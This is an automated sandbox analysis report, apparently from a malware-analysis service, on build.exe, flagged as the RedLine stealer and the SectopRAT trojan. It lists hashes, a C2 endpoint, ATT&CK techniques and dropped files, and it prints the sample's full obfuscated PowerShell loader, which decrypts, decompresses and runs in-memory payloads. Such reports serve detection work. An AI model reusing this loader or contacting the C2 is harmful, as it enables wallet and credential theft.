Overview

overview

10

Static

static

3

build.exe

windows10-1703-x64

10

build.exe

windows10-2004-x64

10

build.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    235s
  • max time network
    300s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-05-2024 18:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    build.exe

  • Size

    351KB

  • MD5

    e00381635f0deee1380080b322aec301

  • SHA1

    751c7ac25d1cbd1a789bea64f46bb226d9cd43e1

  • SHA256

    18c790568c6e0e30d600135a33a9e41ff55e076600fec006772d95849abc4def

  • SHA512

    f401016e001ffad5e731c6afb333acd3124dd8c9d2187b06cc38a4094cb2e67bfd5b8a732587df92ab34bd4902b94cdc5ab5aeb413af857777fb5e5fd13b62a3

  • SSDEEP

    6144:Vkup0yN90QEsvxUDJchSJrcu78hp1mQlZDJ0ML:Wy900WDJLJrtKp1mGRJ0g

Score
10/10
redlinesectopratcheatexecutioninfostealerpersistenceratspywaretrojan

Malware Config

Extracted

Family

redline

Botnet

cheat

C2

ii-restored.gl.at.ply.gg:43416

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3184
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "build.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1184
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('imoYPv8IKhFzZbUQGc9tLwtVTdE/LpsrhzYrOXefWdo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g+kpXPmwAsGMTyt1EM/xyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tjyzH=New-Object System.IO.MemoryStream(,$param_var); $xDXZb=New-Object System.IO.MemoryStream; $QPesd=New-Object System.IO.Compression.GZipStream($tjyzH, [IO.Compression.CompressionMode]::Decompress); $QPesd.CopyTo($xDXZb); $QPesd.Dispose(); $tjyzH.Dispose(); $xDXZb.Dispose(); $xDXZb.ToArray();}function execute_function($param_var,$param2_var){ $hVNQH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKjxO=$hVNQH.EntryPoint; $uKjxO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$rMjrX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($NJxiO in $rMjrX) { if ($NJxiO.StartsWith(':: ')) { $kXTzm=$NJxiO.Substring(3); break; }}$payloads_var=[string[]]$kXTzm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3956
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4056 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:3816

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Unsecured Credentials

    1
    T1552

    Credentials In Files

    1
    T1552.001

    Discovery

    Lateral Movement

    Collection

    Data from Local System

    1
    T1005

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
      Filesize

      276KB

      MD5

      717c25dae776217fbc92897c79fb72b2

      SHA1

      c3d1bbe2b559c0c18423b80bee499f0d23b3b477

      SHA256

      8c3def6d2728ca908b96df1ee12de65b03ca1e4975bbc65813154b846058b949

      SHA512

      4f9a1a953951cbd0cf112939d973fde0dbaff92a4a2149e619ba39998c379ff62d01c6af03005a2c03831d0d989303a7bf3c0c12ba1b3bf85d1b90ab05dd264d

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q0dmasjv.h1u.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp5FEF.tmp
      Filesize

      46KB

      MD5

      02d2c46697e3714e49f46b680b9a6b83

      SHA1

      84f98b56d49f01e9b6b76a4e21accf64fd319140

      SHA256

      522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

      SHA512

      60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp6014.tmp
      Filesize

      92KB

      MD5

      4c2e2189b87f507edc2e72d7d55583a0

      SHA1

      1f06e340f76d41ea0d1e8560acd380a901b2a5bd

      SHA256

      99a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca

      SHA512

      8b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp606E.tmp
      Filesize

      56KB

      MD5

      d444c807029c83b8a892ac0c4971f955

      SHA1

      fa58ce7588513519dc8fed939b26b05dc25e53b5

      SHA256

      8297a7698f19bb81539a18363db100c55e357fa73f773c2b883d2c4161f6a259

      SHA512

      b7958b843639d4223bef65cdc6c664d7d15b76ac4e0a8b1575201dd47a32899feff32389dcc047314f47944ebe7b774cd59e51d49202f49541bbd70ecbb31a2e

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp6084.tmp
      Filesize

      220KB

      MD5

      d04123ed98dc315274ad724f71eb3c6a

      SHA1

      303f2209f4463fbcfd54cd530cf64c54dc359e4f

      SHA256

      ebd34ebd586d89a768cd16c5c773ab32bd260462047f200b995e3956a1bf0a2f

      SHA512

      a46ed9e1b1306a671903b8d084cb047aa5c06bbc686e4c949e26963b02c7292b019642b8a901dcf42c263886117f1024052ddfd00929f564a2d96a415da0a81e

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\tmp60CE.tmp
      Filesize

      96KB

      MD5

      d367ddfda80fdcf578726bc3b0bc3e3c

      SHA1

      23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

      SHA256

      0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

      SHA512

      40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

      Download Submit
    • memory/3956-28-0x0000000006660000-0x0000000006696000-memory.dmp
      Filesize

      216KB

      Download
    • memory/3956-32-0x00000000073C0000-0x00000000073D2000-memory.dmp
      Filesize

      72KB

      Download
    • memory/3956-9-0x0000000005950000-0x00000000059B6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3956-16-0x0000000005AB0000-0x0000000005E04000-memory.dmp
      Filesize

      3.3MB

      Download
    • memory/3956-21-0x0000000005FF0000-0x000000000600E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3956-22-0x00000000060D0000-0x000000000611C000-memory.dmp
      Filesize

      304KB

      Download
    • memory/3956-23-0x000000007459E000-0x000000007459F000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3956-24-0x0000000074590000-0x0000000074D40000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/3956-25-0x00000000078D0000-0x0000000007F4A000-memory.dmp
      Filesize

      6.5MB

      Download
    • memory/3956-26-0x00000000065A0000-0x00000000065BA000-memory.dmp
      Filesize

      104KB

      Download
    • memory/3956-27-0x0000000002690000-0x0000000002698000-memory.dmp
      Filesize

      32KB

      Download
    • memory/3956-8-0x0000000005240000-0x0000000005262000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3956-29-0x00000000072F0000-0x000000000730E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3956-30-0x0000000074590000-0x0000000074D40000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/3956-31-0x0000000009570000-0x0000000009B88000-memory.dmp
      Filesize

      6.1MB

      Download
    • memory/3956-10-0x00000000059C0000-0x0000000005A26000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3956-33-0x0000000007420000-0x000000000745C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/3956-34-0x0000000074590000-0x0000000074D40000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/3956-35-0x0000000007580000-0x000000000768A000-memory.dmp
      Filesize

      1.0MB

      Download
    • memory/3956-37-0x0000000009220000-0x00000000093E2000-memory.dmp
      Filesize

      1.8MB

      Download
    • memory/3956-38-0x000000000A0C0000-0x000000000A5EC000-memory.dmp
      Filesize

      5.2MB

      Download
    • memory/3956-39-0x000000000ABA0000-0x000000000B144000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/3956-40-0x0000000009180000-0x0000000009212000-memory.dmp
      Filesize

      584KB

      Download
    • memory/3956-41-0x00000000090E0000-0x0000000009156000-memory.dmp
      Filesize

      472KB

      Download
    • memory/3956-42-0x0000000009160000-0x000000000917E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3956-7-0x00000000052B0000-0x00000000058D8000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/3956-6-0x0000000074590000-0x0000000074D40000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/3956-5-0x0000000074590000-0x0000000074D40000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/3956-4-0x0000000002B30000-0x0000000002B66000-memory.dmp
      Filesize

      216KB

      Download
    • memory/3956-3-0x000000007459E000-0x000000007459F000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3956-191-0x0000000074590000-0x0000000074D40000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/3956-194-0x0000000074590000-0x0000000074D40000-memory.dmp
      Filesize

      7.7MB

      Download